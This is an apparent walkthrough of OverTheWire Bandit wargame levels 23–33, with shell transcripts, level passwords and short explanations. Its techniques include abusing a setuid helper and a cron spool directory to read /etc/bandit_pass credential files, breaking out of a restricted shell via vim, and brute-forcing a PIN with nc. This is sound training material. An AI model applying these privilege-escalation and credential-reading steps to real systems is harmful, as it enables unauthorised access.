Bandit Level 32 → Level 33

After all this git stuff it's time for another escape. Good luck!

Solution

>>> $0
$ whoami
bandit33
$ cat /etc/bandit_pass/bandit33
c9c3199ddf4121b10cf581a98d51caee

Key points

  1. $0, the first parameter of a script, is always the name of the file currently being executed; using $0 here amounts to running sh (the prompt begins with a single $, which tells us it is sh rather than bash);
  2. whoami shows we are bandit33, so we can read the password file directly;

Bandit Level 31 → Level 32

Solution

bandit31@bandit:~$ mktemp -d
/tmp/tmp.UHFbV1v7DX
bandit31@bandit:~$ cd /tmp/tmp.UHFbV1v7DX
bandit31@bandit:/tmp/tmp.UHFbV1v7DX$ git clone ssh://bandit31-git@localhost/home/bandit31-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit31-git@localhost's password:
remote: Counting objects: 4, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4/4), done.
bandit31@bandit:/tmp/tmp.UHFbV1v7DX$ cd repo/
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ ls
README.md
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ cat README.md
This time your task is to push a file to the remote repository.

Details:
    File name: key.txt
    Content: 'May I come in?'
    Branch: master

bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ echo 'May I come in?' > key.txt
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git add -A
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
nothing to commit, working tree clean
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ cat .gitignore
*.txt
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ :>.gitignore
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git checkout -- <file>..." to discard changes in working directory)

        modified:   .gitignore

Untracked files:
  (use "git add <file>..." to include in what will be committed)

        key.txt

no changes added to commit (use "git add" and/or "git commit -a")
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git add -A
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git commit -m 'Try to resolve it.'
[master e515574] Try to resolve it.
 2 files changed, 1 insertion(+), 1 deletion(-)
 create mode 100644 key.txt
bandit31@bandit:/tmp/tmp.UHFbV1v7DX/repo$ git push
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit31-git@localhost's password:
Counting objects: 4, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (4/4), 339 bytes | 0 bytes/s, done.
Total 4 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost/home/bandit31-git/repo
 ! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'

Key points

  1. git add stores all working-tree changes in the staging area;
  2. git commit records the staged content as a commit in the local repository;
  3. git push sends the local commits the remote does not yet have to the remote repository;
  4. There is a .gitignore file here whose patterns (*.txt) make git ignore matching files; that is why the first git add -A picked up nothing until .gitignore was emptied;

Bandit Level 30 → Level 31

There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo. The password for the user bandit30-git is the same as for the user bandit30.

Clone the repository and find the password for the next level.

Solution

bandit30@bandit:~$ mktemp -d
/tmp/tmp.UkNUXze0ar
bandit30@bandit:~$ cd /tmp/tmp.UkNUXze0ar
bandit30@bandit:/tmp/tmp.UkNUXze0ar$ git clone ssh://bandit30-git@localhost/home/bandit30-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit30/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit30/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit30-git@localhost's password:
remote: Counting objects: 4, done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4/4), done.
bandit30@bandit:/tmp/tmp.UkNUXze0ar$ cd repo/
bandit30@bandit:/tmp/tmp.UkNUXze0ar/repo$ ls
README.md
bandit30@bandit:/tmp/tmp.UkNUXze0ar/repo$ git tag
secret
bandit30@bandit:/tmp/tmp.UkNUXze0ar/repo$ git show secret
47e603bb428404d265f59c42920d81e5

Key points

  1. git tag lists the repository's tags; git show <tag> displays the tagged object;

Bandit Level 29 → Level 30

There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo. The password for the user bandit29-git is the same as for the user bandit29.

Clone the repository and find the password for the next level.

Solution

bandit29@bandit:~$ mktemp -d
/tmp/tmp.5vEfTyPY8r
bandit29@bandit:~$ cd /tmp/tmp.5vEfTyPY8r
bandit29@bandit:/tmp/tmp.5vEfTyPY8r$ git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit29/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit29/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit29-git@localhost's password:
remote: Counting objects: 16, done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 16 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (16/16), done.
Resolving deltas: 100% (2/2), done.
bandit29@bandit:/tmp/tmp.5vEfTyPY8r$ cd repo/
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git log
commit 84abedc104bbc0c65cb9eb74eb1d3057753e70f8
Author: Ben Dover <noone@overthewire.org>
Date:   Tue Oct 16 14:00:41 2018 +0200

    fix username

commit 9b19e7d8c1aadf4edcc5b15ba8107329ad6c5650
Author: Ben Dover <noone@overthewire.org>
Date:   Tue Oct 16 14:00:41 2018 +0200

    initial commit of README.md
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git tag
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git branch
* master
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git branch -r
  origin/HEAD -> origin/master
  origin/dev
  origin/master
  origin/sploits-dev
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git checkout dev
Branch dev set up to track remote branch dev from origin.
Switched to a new branch 'dev'
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ git log
commit 33ce2e95d9c5d6fb0a40e5ee9a2926903646b4e3
Author: Morla Porla <morla@overthewire.org>
Date:   Tue Oct 16 14:00:41 2018 +0200

    add data needed for development

commit a8af722fccd4206fc3780bd3ede35b2c03886d9b
Author: Ben Dover <noone@overthewire.org>
Date:   Tue Oct 16 14:00:41 2018 +0200

    add gif2ascii

commit 84abedc104bbc0c65cb9eb74eb1d3057753e70f8
Author: Ben Dover <noone@overthewire.org>
Date:   Tue Oct 16 14:00:41 2018 +0200

    fix username

commit 9b19e7d8c1aadf4edcc5b15ba8107329ad6c5650
Author: Ben Dover <noone@overthewire.org>
Date:   Tue Oct 16 14:00:41 2018 +0200

    initial commit of README.md
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ ls
code  README.md
bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ cat code/gif2ascii.py

bandit29@bandit:/tmp/tmp.5vEfTyPY8r/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: 5b90576bedb2cc04c86a9e924ce42faf

Key points

  1. A git repository can have multiple branches; a branch is only a pointer into the history tree (here the password was on the remote dev branch);

Bandit Level 28 → Level 29

There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo. The password for the user bandit28-git is the same as for the user bandit28.

Clone the repository and find the password for the next level.

Solution

bandit28@bandit:~$ mktemp -d
/tmp/tmp.0HXHG7V3Lt
bandit28@bandit:~$ cd /tmp/tmp.0HXHG7V3Lt
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit28/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit28-git@localhost's password:
remote: Counting objects: 9, done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt$ cd repo/
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ ls
README.md
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx

bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ git log
commit 073c27c130e6ee407e12faad1dd3848a110c4f95
Author: Morla Porla <morla@overthewire.org>
Date:   Tue Oct 16 14:00:39 2018 +0200

    fix info leak

commit 186a1038cc54d1358d42d468cdc8e3cc28a93fcb
Author: Morla Porla <morla@overthewire.org>
Date:   Tue Oct 16 14:00:39 2018 +0200

    add missing data

commit b67405defc6ef44210c53345fc953e6a21338cc7
Author: Ben Dover <noone@overthewire.org>
Date:   Tue Oct 16 14:00:39 2018 +0200

    initial commit of README.md
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ git checkout b67405defc6ef44210c53345fc953e6a21338cc7
Note: checking out 'b67405defc6ef44210c53345fc953e6a21338cc7'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at b67405d... initial commit of README.md
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ ls
README.md
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: <TBD>

bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ git checkout 186a1038cc54d1358d42d468cdc8e3cc28a93fcb
Previous HEAD position was b67405d... initial commit of README.md
HEAD is now at 186a103... add missing data
bandit28@bandit:/tmp/tmp.0HXHG7V3Lt/repo$ cat README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: bbc96594b4e001778eee9975372716b2

Key points

  1. git is a version-tracking tool: git log shows the history;
  2. git checkout <SHA> checks out a specific historical commit (the "fix info leak" commit only removed the password from the latest revision, not from the history);

Bandit Level 27 → Level 28

There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo. The password for the user bandit27-git is the same as for the user bandit27.

Clone the repository and find the password for the next level.

Solution

bandit27@bandit:~$ mktemp -d
/tmp/tmp.RG0BBbh379
bandit27@bandit:~$ cd /tmp/tmp.RG0BBbh379
bandit27@bandit:/tmp/tmp.RG0BBbh379$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit27/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit27-git@localhost's password:

remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/tmp.RG0BBbh379$ cd repo/
bandit27@bandit:/tmp/tmp.RG0BBbh379/repo$ ls
README
bandit27@bandit:/tmp/tmp.RG0BBbh379/repo$ cat README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2

Key points

  1. The basic git command clone;

Bandit Level 26 → Level 27

Good job getting a shell! Now hurry and grab the password for bandit27!

Solution

bandit26@bandit:~$ ls -l bandit27-do
-rwsr-x--- 1 bandit27 bandit26 7296 Oct 16  2018 bandit27-do
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea

Key points

  1. ls -l shows that the executable bandit27-do has the setuid bit set (the s in -rwsr-x---), so it runs as its owner bandit27;
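The setuid check above, as an added example that is not part of the original writeup: it scans an `ls -l` listing for setuid/setgid entries and reports which identity a given file runs as. The listing is constructed; its first line is the bandit27-do entry from the transcript.

```shell
#!/bin/sh
# Added example (not from the original writeup). Constructed ls -l listing;
# the first line is the bandit27-do entry shown in the level 26 transcript.
SAMPLE_LISTING='-rwsr-x--- 1 bandit27 bandit26 7296 Oct 16  2018 bandit27-do
-rwxr-xr-x 1 root     root     1234 Oct 16  2018 helper
-rwxr-sr-x 1 root     shadow   5678 Oct 16  2018 grouptool
-rwSr--r-- 1 root     root      100 Oct 16  2018 broken'

# Read an ls -l listing on stdin and print "<name>: <bits>" for each entry whose
# mode string carries setuid or setgid. Character 4 of the mode is the owner-execute
# slot (s = setuid plus execute, S = setuid without execute), character 7 the
# group-execute slot; $3 is the owner and $4 the group the file would run as.
privileged_entries() {
    awk '{
        mode = $1; bits = ""
        if (substr(mode, 4, 1) ~ /[sS]/) bits = "setuid(" $3 ")"
        if (substr(mode, 7, 1) ~ /[sS]/) {
            if (bits != "") bits = bits " "
            bits = bits "setgid(" $4 ")"
        }
        if (substr(mode, 4, 1) == "S") bits = bits " [owner-exec bit missing]"
        if (substr(mode, 7, 1) == "S") bits = bits " [group-exec bit missing]"
        if (bits != "") printf "%s: %s\n", $NF, bits
    }'
}

# runs_as NAME CALLER: read an ls -l listing on stdin and print the user NAME
# executes as: its owner when setuid is set, otherwise CALLER (the invoking user).
# Exits 1 if NAME is not in the listing.
runs_as() {
    awk -v name="$1" -v caller="$2" '
        $NF == name { who = (substr($1, 4, 1) ~ /[sS]/) ? $3 : caller; print who; found = 1 }
        END { if (!found) exit 1 }'
}

# Usage: the bandit27-do case from the level above.
printf '%s\n' "$SAMPLE_LISTING" | privileged_entries
printf '%s\n' "$SAMPLE_LISTING" | runs_as bandit27-do bandit26
```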

Bandit Level 25 → Level 26

Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

Solution

Logging in to bandit26 with ssh -i, the session exits immediately, but a lot of content is printed before it exits.
At this point, shrink the terminal height to only a few lines (so the login output cannot be printed in full) and log in again: the output is incomplete and the session no longer exits right away.
Now press v to enter VIM, which keeps the bandit26 login alive.
In VIM command mode, open bandit26's password file: :e /etc/bandit_pass/bandit26.
This gives the password: 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
We are still inside VIM, though, and cannot do much (some environment variables are missing, so system commands cannot be run). Set the variable with :set shell=/bin/bash, then run :shell, and we have a working bash.

Key points

  1. Basic VIM operations;
  2. VIM commands (:e, :set shell, :shell);

Bandit Level 24 → Level 25

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

Solution

bandit24@bandit:~$ :>/tmp/tmp.1YN5hffeea
bandit24@bandit:~$ for i in {0000..9999}
> do
> echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> /tmp/tmp.1YN5hffeea
> done

bandit24@bandit:~$ nc localhost 30002 < /tmp/tmp.1YN5hffeea

...

Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Key points

  1. The loop i in {0000..9999} runs from 0000 to 9999; each value is prefixed with the bandit24 password and appended to a file;
  2. nc reads the file and sends it to local port 30002;

Bandit Level 23 → Level 24

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

Solution

bandit23@bandit:~$ ls -l /etc/cron.d/
total 12
-rw-r--r-- 1 root root 120 Oct 16  2018 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct 16  2018 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct 16  2018 cronjob_bandit24
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i
    fi
done

Reading the script shows that bandit24 executes every file under /var/spool/bandit24, so we create a script that bandit24 can execute and that writes bandit24's password into a world-readable file under /tmp/.

bandit23@bandit:~$ clear
bandit23@bandit:~$ mktemp
/tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ mktemp
/tmp/tmp.HsO4hET86S
bandit23@bandit:~$ vim /tmp/tmp.HsO4hET86S
...
bandit23@bandit:~$ cat /tmp/tmp.HsO4hET86S
#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ chmod +rx /tmp/tmp.HsO4hET86S
bandit23@bandit:~$ ls -l /tmp/tmp.HsO4hET86S
-rwxr-xr-x 1 bandit23 root 65 Sep 10 16:43 /tmp/tmp.HsO4hET86S
bandit23@bandit:~$ chmod 666 /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ ls -l /tmp/tmp.Mcx9oNLd3Q
-rw-rw-rw- 1 bandit23 root 0 Sep 10 16:42 /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ cp /tmp/tmp.HsO4hET86S /var/spool/bandit24/

... wait

bandit23@bandit:~$ cat /tmp/tmp.Mcx9oNLd3Q
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Key points

  1. Read bandit24's script and understand what it does;
  2. Mind the permissions: our script file must be executable by a third party (rx), and the target file must be writable by a third party (rw);
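The /etc/cron.d format read above, as an added example that is not part of the original writeup: it parses cron.d entries (which, unlike a user crontab, carry a user column after the schedule) into user, schedule and command, and checks whether a directory a job executes from is writable by others. The sample cron file is constructed from the cronjob_bandit24 lines shown above plus one invented root entry.

```shell
#!/bin/sh
# Added example (not from the original writeup). Constructed cron.d content:
# the two bandit24 lines are from the transcript above, the root line is invented.
SAMPLE_CRON='# /etc/cron.d format: minute hour dom month dow USER command
SHELL=/bin/bash
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
0 3 * * 0 root /usr/local/sbin/weekly-cleanup.sh'

# Read a cron.d file on stdin and print "user<TAB>schedule<TAB>command" per job.
# Comments, blank lines and VAR=value assignments are skipped; @reboot-style
# aliases occupy one schedule field, the classic form five, and the user follows.
cron_d_jobs() {
    awk '
        /^[[:space:]]*#/ { next }
        NF == 0 { next }
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }
        {
            if ($1 ~ /^@/) { sched = $1; user = $2; start = 3 }
            else { sched = $1 " " $2 " " $3 " " $4 " " $5; user = $6; start = 7 }
            cmd = ""
            for (i = start; i <= NF; i++) { if (i > start) cmd = cmd " "; cmd = cmd $i }
            printf "%s\t%s\t%s\n", user, sched, cmd
        }'
}

# Distinct users the jobs run as: the quick way to see which root-owned cron.d
# files hand execution to another account (here bandit24).
cron_d_users() {
    cron_d_jobs | cut -f1 | sort -u
}

# writable_by_others PATH: true when the group- or other-write bit is set,
# the condition that lets a third party drop files into a spool directory
# that a job like cronjob_bandit24.sh executes from.
writable_by_others() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Usage: list the jobs and users from the constructed sample.
printf '%s\n' "$SAMPLE_CRON" | cron_d_jobs
printf '%s\n' "$SAMPLE_CRON" | cron_d_users
```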